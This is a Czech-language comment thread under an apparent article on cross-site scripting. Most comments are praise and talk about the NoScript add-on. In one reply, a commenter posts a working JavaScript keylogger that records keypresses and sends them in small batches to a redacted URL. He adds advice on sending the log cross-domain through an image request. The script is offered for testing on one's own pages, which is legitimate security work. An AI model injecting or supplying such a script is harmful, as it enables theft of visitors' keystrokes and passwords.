Zpět na seznam článků     Zpět na článek

Komentáře ke článku

 
 
 BBCode
Neekdo | 85.71.110.*1.7.2009 12:53
Moc pekne napsane,ctive a informativni.1
Duck | 85.71.165.*26.3.2008 19:01
Ti co si mysli, ze XSS je jen na straseni malych deti, by si meli precist tuhle zpravu:

[link]

Accuphose | 89.102.49.*24.3.2008 23:35
Díky, kdyby něco nešlo, ozvu se...
.cCuMiNn. | E-mail | Website | PGP24.3.2008 18:41
Accuphose> Kód keyloggeru je velice prostý. Pokud jej chceš testovat na svých stránkách můžeš použít třeba tento využívající AJAX. Pamatuj však na to, že httpRequest, můžeš směrovat pouze v rámci domény. Pokud bys chtěl log zasílat jinam, musel by sis kód upravit, aby jej předával například v parametru URI při požadavku na obrázek.

<script>
function sendkeylog (keylog) {
if (window.ActiveXObject) {
httpRequest = new ActiveXObject("Microsoft.XMLHTTP");
}
else {
httpRequest = new XMLHttpRequest();
}
httpRequest.open("GET", "[link]"+keylog, true);
httpRequest.send(null);
}

function savekeycode (e) {
keylog+=String.fromCharCode(e.charCode);
if ((keylog.length==5)||(e.keyCode==13)) {
sendkeylog(keylog);
keylog="";
}
}
keylog="";
document.onkeypress=savekeycode;
</script>


----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
Accuphose | 89.102.49.*23.3.2008 2:12
Jistě zajímavé téma, z mojeho pohledu na věc, bych rád zkusil v praxi ten Javascript Keylogger, použil bych to na testování schopností bezpečnostních programů. Je někdo schopen to realizovat? Respektive napsat, dám to pak na testovací stránku(neveřejnou) a otestuju.
S3E | 90.176.83.*19.3.2008 15:30
heh,cummin byl na nove jak s dostal na post.sk :D,ale to sem asi nepatri..
olgo | 193.110.186.*6.3.2008 19:20
pekny clanok.
k tomu xssp nikdy som xss nebral na lahku vahu ale toto ma dostalo.
DjH | E-mail | Website | ICQ 319-960-8956.3.2008 18:08
sQuo to rekl :), jinak kdyby se vas ptal, ja vam to nerekl ;)

----------
..:@]> [link] <[@:..
InSaN3 | E-mail | Website | ICQ 3046512106.3.2008 16:58
Pěkný článek, xss-proxy je celkem zajímavý projekt.

mr.Crow: Noscript taky řešení, když tě to neomezuje :)

K tomu OT níže nechci moc psát, ale na tohle reagovat musím. Kdo řekl že Kondomem se proti aids neubráníš? :)



----------
"Když se zblázníte, víte o tom, že jste se zbláznili? A když ne, jak víte, že nejste blázen?" Terry Pratchett
[link]
mr.Crow | E-mail | Website5.3.2008 22:45
já se xss nebojím, já používám Noscript. Téměř vůbec mě neomezuje, pokud nějaká site vyžaduje k funkčnosti JS, povolím ho dvěma kliknutími... a navíc jsem zbaven většiny otravných reklam.

----------
Get enlightened!

Stránky: 1 2 3 4 5